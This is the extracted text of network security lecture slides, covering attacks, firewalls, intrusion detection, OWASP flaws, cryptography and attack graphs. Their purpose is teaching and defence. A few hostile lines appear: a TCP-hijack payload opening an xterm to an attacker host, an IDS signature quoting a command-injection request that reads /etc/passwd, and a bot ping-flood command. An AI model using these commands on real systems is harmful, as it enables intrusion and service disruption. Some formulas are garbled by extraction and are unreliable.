Network Security H B ACHARYA NETWORK SECURITY

NETWORK SECURITY

Network Security

Day 1

The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to

receive him;

not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.

NETWORK SECURITY

A Few Terms

• potential for undesirable outcomes

THREAT

• mechanism by which loss can happen

VULNERABILITY

• deliberate assault on system

Security: Goals

To achieve particular (security) properties

in the presence of particular kinds and levels of threat. • What properties?

NETWORK SECURITY

Security

The protection afforded to an automated information system in order to attain the applicable objectives of preserving the integrity,

availability and confidentiality of information system resources (includes hardware, software, firmware, information/data, and

telecommunications)

NETWORK SECURITY

Aspects of Security

Consider the 3 aspects of information security:

◦

Security attack

◦

Security mechanism (control)

Security Requirements

Confidentiality Integrity Availability Authenticity Non-repudiation Authorization

NETWORK SECURITY

Security Requirements

Confidentiality:

Only authorized parties have read access to information

Integrity:

Security Requirements

Availability:

Authorized access to information when needed

Authenticity:

NETWORK SECURITY

Security Requirements

Non-repudiation:

Message exchange can be proved by sender and receiver

Authorization:

Security Requirements

Freshness:

NETWORK SECURITY

Passive Attacks

Release of message content (eavesdropping)

◦ Prevented by encryption

Traffic Analysis

◦ Fixed by traffic padding

NETWORK SECURITY

Active Attacks

Involve

modification

of the data stream, or

creation

of a

false data stream

Active Attacks (cont.)

Masquerade

Replay

Modification of messages

Denial of service

NETWORK SECURITY

Attack Frameworks

Attacks Physical Access Attacks -- Wiretapping Server Hacking Vandalism (Damage) Dialog Attacks -- Eavesdropping Impersonation Message Alteration Penetration Attacks (Access) Social Engineering -- Opening Attachments Password Theft Information Theft Scanning (Probing) Break-in Denial of Service (Rejection) Malware -- Viruses Worms

Eavesdropping

NETWORK SECURITY

Compromise the service

Confidentiality

Client PC

Bob Server

Alice Dialog

Attacker (Eve) intercepts and reads messages Hello

Hello

Encryption

Client PC

Bob Server _Alice

“100100110001” Encrypted

Message “100100110001”

NETWORK SECURITY

15-441 Networks Fall 2002 ₂₁

Packet Sniffing

Recall how Ethernet works …

When someone wants to send a packet to some else …

They put the bits on the wire with the destination MAC address … And remember that other hosts are listening on the wire to detect

for collisions …

It couldn’t get any easier to figure out what data is being transmitted over the network!

Packet Sniffing

This works for wireless too!

NETWORK SECURITY 23

Packet Sniffing

What kinds of data can we get?

Asked another way, what kind of information would be most useful to a malicious user?

Answer: Anything in plain text ◦ Passwords are the most popular

Packet Sniffing

How can we protect ourselves?

Encryption!

SSH, not Telnet

NETWORK SECURITY 25

Packet Sniffing

HTTP over SSL

◦ Especially when making purchases with credit cards! SFTP, not FTP

◦ Unless you really don’t care about the password or data ◦ Can also use KerbFTP

IPSec

Item of Special Interest: Keyloggers

What’s a Keylogger and how does it exploit a Web

Application?

◦ Downloaded unknowingly

◦ Resident on Personal Computers

◦ Captures User Activity

NETWORK SECURITY

Keylogger Mitigations

◦ Train users

◦ Implement effective Anti-Spyware, Anti-Virus ◦ Keep patches and versions current

◦ Firewall

◦ Automatic form filler programs ◦ Cut and paste

◦ One-time passwords ◦ Smartcards

◦ Virtual keyboards

Virtual Keyboard

Some of the features of Federal Student Aid’s Virtual Keyboard Include: ◦ Highly effective in evading true “Key Logging”

◦ Widely used by many financial institutions

◦ Low cost technology to deploy (even for 50 million users)

◦ Does not require any new hardware or software on client machines ◦ Can work in conjunction with the existing keyboard

◦ Keys can be entered by mouse click or by leaving mouse on the key for 2 seconds

NETWORK SECURITY

Item of Special Interest: WSNPOEM

WSNPOEM

◦ Variant of the Banker/InfoStealer/Bancos/Zbot family

◦ PWS-Banker.gen.bw by McAfee, Infostealer.Banker.C by Symantec, Trojan-Spy.Win32.Bancos.aam by Kaspersky, Mal/Zbot-A by Sophos ...

◦ How does it exploit a Web Application? ◦ WinInet interception

◦ In-process key-logging

Item of Special Interest WSNPOEM

How do we know about it:

◦ Since 2004 we have been receiving periodic files from US-CERT

◦ Now provided weekly

◦ Government wide concern Impact:

◦ > 22,000 unique compromised SSNs

NETWORK SECURITY

Item of Special Interest: WSNPOEM

Malware Occurances wsnpoem_v2 296475 wsnpoem_v3 394 wsnpoem_v6 15643 wsnpoem_v4 3447 wsnpoem 5019 haxdoor 4888 nethelper 4025 win32agent 3412 fireming 3063 silentbanker_v2 1583 passsickle 264 manda 259 nowhere 217 win32agent_v4 39 urlzone 6 31

The wsnpoem malware & variants make up 95% of the incidents captured in the US-CERT files

Item of Special Interest: WSNPOEM

What can be done at the application side?

◦ Require two factor authentication

◦ Virtual Keyboards, URL encoding, header encryption, shared keys, security questions, and images are all vulnerable to this type of attack

◦ Training and awareness for client side prevention

◦ Train those that are accessible

◦ Broadcast messages or post warnings on websites

What can be done at the client side?

NETWORK SECURITY

Modification

Modification

Compromise the service

Integrity

Client PC

Bob Server _Alice

Dialog Balance = $1 Balance = Balance = $1,000,000

NETWORK SECURITY

Fabrication

Fabrication

Compromise the service

Authenticity

Client PC Attacker

I’m Bob

Prove it!

(Authenticate Yourself)

NETWORK SECURITY

Modification & Fabrication Defense

Secure Dialog

Client PC

Bob Server

Alice

Attacker cannot read messages, alter messages, or impersonate Automatically Handles

Negation of Security Options Authentication

Encryption Integrity

TCP Attacks

Recall how IP works…

◦ End hosts create IP packets and routers process them purely based on destination address alone

Problem: End hosts may lie about other fields which do not affect delivery

◦ Source address – host may trick destination into believing that the packet is from a trusted source

◦ Especially applications which use IP addresses as a simple authentication method ◦ Solution – use better authentication methods

NETWORK SECURITY 39

TCP Attacks

TCP connections have associated state ◦ Starting sequence numbers, port numbers

Problem – what if an attacker learns these values?

◦ Port numbers are sometimes well known to begin with (ex. HTTP port 80) ◦ Sequence numbers are sometimes chosen in very predictable ways

TCP Attacks

If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!

Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source

◦ Ex. Instead of downloading and running new program, you download a virus and execute it

NETWORK SECURITY 41

TCP Attacks

TCP Attacks

NETWORK SECURITY 43

TCP Attacks

Mr. Big Ears lies on the path between Alice and Bob on the network ◦ He can intercept all of their packets

TCP Attacks

First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?)

Packets

NETWORK SECURITY 45

TCP Attacks

Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)

TCP Attacks

What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?

◦ Can just DoS Alice instead of dropping her packets

◦ Can just send guesses of what the ISN is until it is accepted How do you know when the ISN is accepted?

◦ Mitnick: payload is “add self to .rhosts” ◦ Or, “xterm -display MrBigEars:0”

NETWORK SECURITY 47

TCP Attacks

Why are these types of TCP attacks so dangerous?

Web server

Malicious user

TCP Attacks

How do we prevent this? IPSec

◦ Provides source authentication, so Mr. Big Ears cannot pretend to be Alice ◦ Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without

NETWORK SECURITY

Service Disruption and Interruption

Service Disruption and Interruption

Compromise the service

Availability

Message Flood

Server Overloaded By Message Flood

NETWORK SECURITY

Non-repudiation

When sending/receiving messages,

both parties involved get evidence of the communication.

Later on, neither of them can successfully deny that the

Evidence is often in the form of signed messages, which provides guarantees concerning their originator.

Might also provide mechanisms to guarantee fairness.

No party should – at any step – have the evidence that they require

NETWORK SECURITY

The main objective of a non-repudiation protocol is thus that of creating the evidence for the parties involved.

1. Correctness will be concerned with the suitability of the evidence.

2. Analysis will need to take into consideration the fact that each party might have acted not in compliance with the protocol.

Anonymity

Seem like an unusual property for security protocols to ensure … Mostly required by malicious actions?

Nope!

Who else needs well-formed secured communication protocols? Whistle-blowers, anti-Government protesters

NETWORK SECURITY

Anonymity

Its main objective is that of protecting the identity of

agents with respect to particular events or messages.

◦ The messages need not be protected.

◦ The model separates:

1. the identity of the agents who sent a message

Common security attacks and their

countermeasures

Finding a way into the network

◦ Firewalls

Exploiting software bugs, buffer overflows

◦ Intrusion Detection Systems

Denial of Service

NETWORK SECURITY 58

Common security attacks and their

countermeasures

TCP hijacking

◦ IPSec

Packet sniffing

◦ Encryption (SSH, SSL, HTTPS)

Social problems

◦ Education

Minor Detour…

Say we got the /etc/passwd file from the IRIX server What can we do with it?

NETWORK SECURITY 60

Dictionary Attack

We can run a dictionary attack on the passwords

◦ The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash)

◦ Can take a dictionary of words, crypt() them all, and compare with the hashed passwords

This is why your passwords should be meaningless random junk! ◦ For example, “sdfo839f” is a good password

◦ That is not my andrew password

Denial of Service

Purpose: Make a network service unusable, usually by overloading the server or network

Many different kinds of DoS attacks ◦ SYN flooding

◦ SMURF

◦ Distributed attacks

NETWORK SECURITY 62

Denial of Service

SYN flooding attack

Send SYN packets with bogus source address

◦ Why?

Server responds with SYN ACK and keeps state about TCP half-open connection

◦ Eventually, server memory is exhausted with this state Solution: use “SYN cookies”

◦ In response to a SYN, create a special “cookie” for the connection, and forget everything else

◦ Then, can recreate the forgotten information when the ACK comes in from a legitimate connection

Denial of Service

SMURF

◦ Source IP address of a broadcast ping is forged

NETWORK SECURITY 64

Denial of Service

Internet

Perpetrator Victim

ICMP echo (spoofed source address of victim) Sent to IP broadcast address

Denial of Service

Distributed Denial of Service

◦ Same techniques as regular DoS, but on a much larger scale ◦ Example: Sub7Server Trojan and IRC bots

◦ Infect a large number of machines with a “zombie” program

◦ Zombie program logs into an IRC channel and awaits commands

◦ Example:

◦ Bot command: !p4 207.71.92.193

◦ Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 ◦ Sends 10,000 64k packets to the host (655MB!)

NETWORK SECURITY 66

Denial of Service

Mini Case Study – CodeRed

◦ July 19, 2001: over 359,000 computers infected in less than 14 hours ◦ Used a recently known buffer exploit in Microsoft IIS

Denial of Service

Why is this under the Denial of Service category?

◦ CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month!

NETWORK SECURITY 68

Denial of Service: Counter Measures

◦ Ingress filtering (RFC 2267)

◦ If a packet p comes in on an interface I,

and no known route to the source of p passes through I, drop p

◦ Stay on top of CERT advisories and security patches

Summary

Security Attacks

Security Attacks

Summary

Interruption: This is an attack on availability

Interception: This is an attack on confidentiality Modification: This is an attack on integrity

Fabrication: This is an attack on authenticity

Alert Ahead of Time!

NETWORK SECURITY

Firewalls

Basic problem – many network applications and protocols

have security problems that are fixed over time

◦ Difficult for users to keep up with changes and keep host secure

◦ Solution

◦ Administrators limit access to end hosts by using a firewall ◦ Firewall is kept up-to-date by administrators

NETWORK SECURITY 74

Firewalls

Like a castle with a drawbridge

◦ Only one point of access into the network

◦ This can be good or bad ◦ Easier to DOS

Can be hardware or software

◦ Ex. Some routers come with firewall functionality

◦ ipfw, ipchains, pf on Unix systems, Windows from XP onwards, and Mac OS X have built in firewalls

Firewalls

DMZ

Internet Fi rew a ll Fi rew a ll Web server, email server, web proxy, etc

NETWORK SECURITY 76

Firewalls

Used to filter packets based on a combination of features ◦ Simple, network-layer packet filtering firewalls

◦ man ipfw

e.g. Drop packets with destination port of 23 (Telnet)

Just turn Telnet off? ◦ On all devices …

Firewalls

Here is what a computer with a default Windows XP install looks like:

◦ 135/tcp open loc-srv ◦ 139/tcp open netbios-ssn ◦ 445/tcp open microsoft-ds ◦ 1025/tcp open NFS-or-IIS ◦ 3389/tcp open ms-term-serv ◦ 5000/tcp open UPnP

Might need some of these services, or might not be able to control all the machines on the network

NETWORK SECURITY 78

Firewalls

What does a firewall rule look like? ◦ Depends on the firewall used

Example: ipfw

◦ /sbin/ipfw add deny tcp from cracker.evil.org

to wolf.tambov.su telnet

Other examples: WinXP & Mac OS X have built in and third party firewalls

◦ Different graphical user interfaces

Network Penetration (Access) Attacks

and Firewalls

Attack Packet Internet Attacker Hardened Client PC Passed Packet Dropped Packet Internet Firewall

NETWORK SECURITY

Scanning (Probing) Attacks

Probe Packets to 172.16.99.1, 172.16.99.2, etc. Internet Attacker Corporate Network Host 172.16.99.1 No Host 172.16.99.2 No Reply Reply from 172.16.99.1 Results 172.16.99.1 is reachable 172.16.99.2 is not reachable …

Intrusion Detection

Used to monitor for “suspicious activity” on a network

◦ Can protect against known software exploits, like buffer overflows Open Source IDS: Snort, www.snort.org

NETWORK SECURITY 82

Intrusion Detection

Uses “intrusion signatures” ◦ Well known patterns of behavior

◦ Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc. Example

◦ IRIX vulnerability in webdist.cgi

◦ Can make a rule to drop packets containing the line

◦ “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring

NETWORK SECURITY

Definition

• Vulnerability : a weakness in a system which allows an attacker to

violate the integrity of that system.

– weak passwords

– software bugs

– a computer virus or other malware

– script code injection

Common Vulnerabilities and Exposures

http://cve.mitre.org/

◦ CVE is a list or dictionary that provides common names (and CVE numbers) for publicly known information security vulnerabilities

◦ e.g. CVE-2008-0075:

Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 through 6.0 allows remote attackers to execute arbitrary code via crafted inputs to ASP pages.

NETWORK SECURITY

Exploit

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a vulnerability

in order to cause unintended or unanticipated behavior to occur on computer software & hardware.

Commonly categorized and named by the type of vulnerability they utilize: E.g.

SQL Injection Vulnerability  SQL Inj. Exploit Buffer Overflows Vulnerability  B.O. Exploit

OWASP Top 10 Security Vulnerabilities

1 - Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

2 - Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

3 - Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

NETWORK SECURITY

OWASP Top 10 Security Vulnerabilities

4 - Insecure Direct Object Reference A direct object reference occurs when a developer exposes a

reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without

authorization.

5 - Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a

pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

6 - Information Leakage and Improper Error Handling Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.

OWASP Top 10 Security Vulnerabilities

7 - Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other

users' identities.

8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.

9 - Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.

10 - Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access

NETWORK SECURITY

OWASP Top 1: Cross Site Scripting

◦ What is Cross Site Scripting?

◦ In it’s simplest form, it’s a process that can occur anywhere a web application uses input from a malicious user to generate output without validating or encoding the input.

◦ During a Cross Site Scripting attack, a malicious source sends a script that is executed by the end user’s

browser. It allows attackers to embed code from one webpage into another webpage by changing its HTML code.

◦ It’s been used to deface web sites, conduct phishing attacks, or it can take over a user’s browser and force them to execute commands they’re unaware of.

◦ Cross Site Scripting attacks usually come in the form of JavaScript however, any active content poses a potential danger.

◦ Prevention

◦ Validate the users input against what is expected

◦ Encode user supplied output

◦ After you believe you’ve done the right things during code development, inspect your code with a scan.

OWASP Top 2: Injection Flaws (SQL

Injection)

◦ What is SQL Injection

◦ SQL injection is the actual injection of SQL commands into web applications through user input fields.

◦ When an application uses internal SQL commands and you also have user input capabilities (like a login screen), SQL commands can be injected that can create, read, update, or delete any data available to the application.

◦ Prevention

◦ You can put tight constraints on user inputs. But the best method of preventing SQL injection is to avoid the use of dynamically generated SQL in your code. Instead use stored or canned

NETWORK SECURITY

OWASP Top 3: Malicious File Execution

◦ What is Malicious File Execution

◦ When Developers program applications to use input files provided by the user and the bad guy is the one entering the file, a malicious file is executed unknowingly, thus we have malicious file execution.

◦ Malicious file execution attacks can occur anytime the application accepts filenames or files from a users.

◦ When these files are executed, they can be used to do just about anything from stealing data to taking over the entire system.

◦ Prevention

◦ Strongly validate user input using "accept known good" as a strategy, or isolate incoming files and check them legitimacy before executing them.

◦ Disable certain PHP commands: I suggest that you visit the OWASP website to see what commands to disable.

OWASP Vulnerabilities: A Common Thread

Common theme: Applications with Dynamic code or user inputs have the most vulnerabilities!

But required for current, rich applications Building applications of that nature?

NETWORK SECURITY

SANS Top 20 Security Vulnerabilities

NETWORK SECURITY

National Vulnerability Database

In the near future, information warfare will control the form and

future of war... Our sights must not be fixed on the fire-power of the industrial age; rather, they must be trained on the information

warfare of the information age.

NETWORK SECURITY

Other Vulnerabilities

Code Mistakes

Untrained Users

Insecure Configuration Settings

Code Mistakes

◦

Federal Student Aid has had Code Mistakes

◦ Implement Prevention in Code ◦ Thoroughly Test

◦ Use Tools

NETWORK SECURITY

Untrained Users

◦ Security ignorance compromises data

◦ Provide the training

◦ Rules of Behavior

◦ Annual refresher training

Insecure Configuration Settings

◦

NIST, DISA, CIS vs. Business Needs

◦

Builds

◦

System Upgrades

◦

Vulnerability Scans

NETWORK SECURITY

Item of Special Interest: FSA Actions

Revoke User Access

Notify User / School

Review Logs

Assist User / School Clean Computer

How Much Security is Enough?

Estimate: Cost vs. Risk

◦ Risk = Threat * Vulnerability

NETWORK SECURITY 104

Social Problems

People can be just as dangerous as unprotected computer

systems

◦ People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information

◦ Most humans will breakdown once they are at the “harmed” stage, unless they have been specially trained

Social Problems

Fun Example 1:

◦ “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me”

NETWORK SECURITY 106

Social Problems

Fun Example 2:

◦ Someone calls you in the middle of the night

◦ “Have you been calling Egypt for the last six hours?” ◦ “No”

◦ “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you”

Social Problems

Fun Example 3:

◦ Who saw Office Space?

◦ In the movie, the three disgruntled employees installed a money-stealing worm onto the companies systems

◦ from inside the company, where they had full access to the companies systems

NETWORK SECURITY 108

Social Problems

There aren’t always solutions to all of these problems

◦ Humans will continue to be tricked into giving out information they shouldn’t ◦ Educating them may help a little here, but, depending on how bad you want

the information, there are a lot of bad things you can do to get it

So, the best that can be done is to implement a wide variety of

solutions and more closely monitor who has access to what network resources and information

The Security Bias

The balance between the threat to a system and the

security services deployed is very Asymmetric:

You need to defend

each and every

aspect to be successful

Summary

The Internet works only because we implicitly trust one another

It is very easy to exploit this trust The same holds true for software

It is important to stay on top of the latest CERT security advisories to know how to patch any security holes

Conclusions

NETWORK SECURITY

The what

The scientific mix of mathematical theory and

computational application which allows the confidential

transfer of information.

Kerckhoff’s Principle

The philosophy of modern cryptoanalysis is embodied in the following principle formulated in 1883 by Jean Guillaume Hubert Victor Francois Alexandre Auguste

Kerckhoffs von Nieuwenhof (1835 - 1903).

The security of a cryptosystem must not depend on keeping secret the encryption algorithm. The security should depend only on

keeping secret the key.

NETWORK SECURITY

Paradoxes of modern cryptography

Positive results of modern cryptography are based on negative results

of complexity theory.

Computers that were designed originally for decryption seem to be now more useful for encryption.

Cryptosystems - ciphers

The cryptography deals the problem of sending a message (plaintext, cleartext), through a insecure channel, that may be tapped by an adversary (eavesdropper, cryptanalyst), to a legal receiver.

NETWORK SECURITY

Components of cryptosystems

Plaintext-space: P – a set of plaintexts over an alphabet

Cryptotext-space: C – a set of cryptotexts (ciphertexts) over alphabet Key-space: K – a set of keys

Each key k determines an encryption algorithm e_k and an decryption algorithm d_k

such that, for any plaintext w, e_k (w) is the corresponding cryptotext and:

  e w 

d

w _{k k} w d_ke_k w .

As encryption algorithms we can use also randomized algorithms. or

Requirements for good cryptosystems

1. Given 𝑒_𝑘 and a plaintext 𝑘, it should be easy to compute 𝑐 = 𝑒_𝑘(𝑤) . 2. Given 𝑑_𝑘 and a cryptotext 𝑐, it should be easy to compute 𝑤 = 𝑑_𝑘 𝑐 . 3. A cryptotext 𝑒_𝑘(𝑤) should not be much longer than the plaintext 𝑤. 4. It should be unfeasible to determine 𝑤 from 𝑒_𝑘(𝑤) without knowing 𝑑_𝑘.

5. The so called avalanche effect should hold: A small change in the plaintext, or in the key, should lead to a big change in the cryptotext (i.e. a change of one bit of the plaintext should result in a change of all bits of the cryptotext, each with the probability close to 0.5).

6. The cryptosystem should not be closed under composition, i.e. not for every two keys 𝑘₁, 𝑘₂ there is a key 𝑘 such that

NETWORK SECURITY

Substitution Ciphers

A cipher that substitutes one character with another.

These can be as simple as swapping a list, or can be based on more complex rules.

Caesar ciphers

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

Substitute the letters in the second row for the letters in the top row to encrypt a message

Encrypt(COMPUTER) gives FRPSXWHU

Substitute the letters in the first row for the letters in the second row to decrypt a message

NETWORK SECURITY

Transposition Cipher

T O D A Y + I S + M O N D A Y

Write the letters in a row of five, using '+' as a blank. Encrypt by starting spiraling inward from the top left moving counter clockwise

Encrypt(TODAY IS MONDAY) gives T+ONDAYMYADOIS+

Decrypt by recreating the grid and reading the letters across the row

Encryption on computers

Roughly speaking, there are two different broad types of encryption that are used on computers today

◦ Symmetric encryption relies on keeping keys totally secret

◦ Asymmetric encryption actually publicizes one key, but keeps some information private also

Neither is really “better” - they just use different principles. In reality, both are vulnerable to attacks.

NETWORK SECURITY

Symmetric, or private key cryptography

Most common type is called a block cipher

◦ Processes the plaintext in fixed sizes blocks

Examples include DES, 3DES, and AES

All require a secret key which is known by both parties in the communication Main issue here: need to securely swap the key. How can we do this?

DES: Data Encryption Standard

Adopted 1977, National Bureau of Standards (now NIST)

• Divide message into blocks of 64 bits

• Take a key of 56 bits

NETWORK SECURITY

DES

In July 1998, DES was officially cracked by a machine built by the EFF ◦ Total cost: under $250,000

◦ Total time: 6-8 months

They then published the details of their approach, which essentially was a brute force attack

Note: 56 bits means 256 _{keys to try}

Also, not as easy as just trying. What do you always do to files before sending them somewhere?

3DES

Effort to salvage DES.

Just repeat DES 3 times with different keys! ◦ Effectively DES, with key size 168 bits.

Still secure - brute force attacks take too long ◦ and that is the only way to attack this algorithm

NETWORK SECURITY

Advanced Encryption Standard (AES)

Designed in response to a call by NIST in 1998 Officially adopted in 2001

Block length is 128 bits, and keys can be 128, 192, or 256 bits. Essentially, proceeds in 4 rounds (which are repeated):

◦ Substitute bytes ◦ Permute

◦ Mix columns ◦ Add round key

Stage 1: substitute bytes

AES computes a matrix which maps every 8-bit value to a different 8-bit value

Computed using properties of finite fields (go take some math classes to learn more about this)

NETWORK SECURITY

Stage 2: permute

Stage 3: Mix columns

Here, the 4 bytes in each column are combined using a linear transformation

NETWORK SECURITY

Stage 4: Add round key

Public Key Cryptography

First revolution in cryptography in hundreds of years

Originally introduced in 1976 “New directions in cryptography” by Diffie and Hellman

NETWORK SECURITY

Public/Private Keys

Each user has two related keys ◦ one public and one private.

All public keys are distributed freely. Private key belongs only to user.

To ensure confidentiality: encrypt outgoing message using receiver's public key.

Basic operations

Logarithms: defined as the the exponent to which a fixed number, the base, must be raised to in order to produce that number

Examples:

◦ Log₃ 9 = 2, since 32 _{= 9}

◦ Log₁₀1000 = 3, since 103 _{= 1000}

◦ Log₂64 = 6, since 26 _{= 64}

NETWORK SECURITY

Basic operations (cont)

Modulo operation: taking remainders

a mod b = remainder when a is divided by b Examples:

◦ 1 mod 3 = 1 ◦ 15 mod 10 = 5 ◦ 256 mod 2 = 0

Public and private keys

First, choose X, a secret key

Then choose Q = a prime number, and A = some other number Set Y = AX _{mod Q}

NETWORK SECURITY

Public and private keys

Now publish Y, A, and Q, but keep X secret

Anyone knows that X = log_A Y mod Q, but this is difficult to compute! This is called the discrete logarithm problem - very similar to

factoring in terms of difficulty, so no polynomial time algorithm is known.

Essentially, computing Y given X is easy, but computing X given Y is much harder.

(Go take number theory.)

How to encrypt

So I know X, Y, A, and Q (but you don’t know X). You get your own X’, and the tell me Y’=AX’ _{mod Q}

We can now compute our own secret key (and use it for AES or some other algorithm)

◦ I will compute (Y’)X _{mod Q = (A}X’₎X _{mod Q}

◦ You compute (Y)X’ _{mod Q = (A}X₎X’ _{mod Q}

These are equal! But an eavesdropper can’t compute them, since they don’t have X or X’

NETWORK SECURITY

Attacks

One downside: this is less secure than pure symmetric encryption There are ways to attack this that do better than brute force

Number theory and group theory allow theoretical attacks that are provably better than exponential, but worse than polynomial time So it is NOT known if this problem is really hard! Someone could

RSA

In 1977, Rivest, Shamir, and Adleman came up with another way to use public key cryptography Rather than secure key exchanges, this one actually lets you encrypt whole messages

NETWORK SECURITY

How RSA works

Choose 2 prime numbers, p and q n = pq

(x) = # numbers less than x and relatively prime to x ◦ (That means numbers which have no common divisors.)

Note (n) = (p) (q) ◦ What is (p)? (q)?

RSA (cont.)

(n) = (p-1)(q-1)

• Hard to find if you don’t know p and q … easy if you do.

Pick any e > 1, relatively prime to (n) . This is your public key. Compute d, such that de = 1 mod (n). This is your private key.

◦ Example: Suppose e = 2, n = 11.

NETWORK SECURITY

Encrypting with RSA

Suppose I have a message m, as well as e and n. I compute c = me _{mod n, and send it to you.}

You have d.

You can compute cd _{mod n = (m}e₎d _{mod n = m}1 _{mod n.} For attacker, without d, this is not easy!

Ciphers

NETWORK SECURITY

Public/Private Keys: Other uses

Digital signature

Data that is appended to a message, made from the message itself and the sender's private key, to ensure the authenticity of the

message

Digital certificate

A representation of a sender's authenticated public key used to minimize malicious forgeries

Main types of cryptoanalytics attack

1. Cryptotexts-only attack: The cryptanalysts get cryptotexts

c₁ = e_k(w₁),…, c_n = e_k(w_n) and try to infer the key k or as many of the plaintexts w₁,…, w_n as possible.

2. Known-plaintexts attack

The cryptanalysts know some pairs w_i, e_k(w_i), 1 ≤ i ≤ n, and try to infer k, or at least w_n+1 for a new cryptotext many plaintexts e_k(w_n+1).

3. Chosen-plaintexts attack

NETWORK SECURITY

Main types of cryptoanalytics attack

4. Known-encryption-algorithm attack

The encryption algorithm e_k is given and the cryptanalysts try to get the decryption algorithm d_k.

5. Chosen-cryptotext attack

The cryptanalysts know some pairs

(c_i , d_k(c_i)), 1 ≤ i ≤ n,

where the cryptotext c_i have been chosen by the cryptanalysts. The aim is to determine the key. (For example, if cryptanalysts get a temporary access to decryption machinery.)

Summary

Cryptography

NETWORK SECURITY

Attack Graph

Attack graph is the data structure which is used to represent all possible attacks on a network

NETWORK SECURITY

Example of Attack Graph Developed by a Professional

Red Team

NETWORK SECURITY

Problem Statement

Problem: Generating attack graphs by hand is tedious, error-prone, and impractical for large systems.

Goal: Automate the generation and analysis of attack graphs.

◦ Generation

◦ Must be fast and completely automatic ◦ Must handle large, realistic examples

◦ Should guarantee properties of attack graphs ◦ Analysis

◦ Must enable security analysis by system administrators ◦ Should support incremental, partial specification

Automated Generation Procedure

XML spec for: network, vulnerability, connections, safety property…

NuSMV: symbolic model checkers, modified version, used to automatically produce AG

NETWORK SECURITY 4 hosts 30 actions 138 nodes 742 edges 6 minutes

 = Attacker gains root access to

A Graph Larger than Fits on Screen

 = Attacker gains root access to Host 1.

4 hosts 30 actions

larger initial state space 310 nodes

NETWORK SECURITY

An Illustrative Example

database attacker firewall Windows Linux Squid firewall IIS Web Server IDS LICQ Action Arsenal

IIS buffer overflow: remotely get root

Squid portscan: port scan

LICQ remote-to-user: gain user privileges remotely

IE scripting exploit: gain user privileges remotely

local buffer overflow: locally get root

Always Detected

Attack goal: disrupt the functioning of the database

Security Property

Attack graphs depict ways in which an intruder can force a network into an unsafe state:

NETWORK SECURITY

Example Attack Graph

database attacker firewall Windows Linux Squid firewall IIS Web Server IDS LICQ

Alternative Attack Scenario avoiding IDS

database attacker firewall Windows Linux Squid firewall IIS Web Server IDS LICQ

NETWORK SECURITY

Automated Analysis:

Single Action Removal

Automated Analysis:

Minimization Analyzer

What actions are necessary for the intruder to succeed?

◦ Given a fixed set of atomic attacks, not all of them may be available to the intruder ◦ Nondeterministically decide which subset of atomic attacks to choose initially

NETWORK SECURITY

Automated Analysis:

Minimum Critical Set of Actions

A = the set of actions available to the intruder

Def 1: A set of actions C is critical if the intruder cannot achieve his goal using only actions in A \ C.

Def 2: A critical set of actions C is minimum if there is no critical action set of smaller size.

Def 3: A set of actions A’  A is realizable if the intruder can achieve his goal using only actions in A’.

Minimum Critical Set of Actions (MCSA):

◦ Given a set of actions A and an attack graph G, find ◦ a minimum critical action subset C  A.

Finding a minimum set: NP-complete

Reliability Analyzer

What is the likelihood that the intruder goes undetected? ◦ Interpret as a Markov Decision Process

◦ Assign probability for detecting each atomic attack

◦ Each attack has both detectable and stealthy variants Probabilistic Attack Graph

NETWORK SECURITY

Overview

Phase 2

Annotations

Phase 1

System Model Security Property

Attack Graph

Generator

Query: What actions are necessary for the intruder to succeed?

Attack Subgraph

Minimization Analyzer

Query: What is the likelihood that the

intruder goes undetected?

Probabilistic Attack Graph

Reliability

Analyzer …

Risk

Analyzer

Query: What is the

intruder’s risk of discovery during an attack?

Limitations

Attack Graph Visualization Problem

Limitations

Scalability Problem

Too complex and difficult to use for large network

Zero-day exploit

A zero-day (or zero-hour) attack or threat is a computer threat that tries to

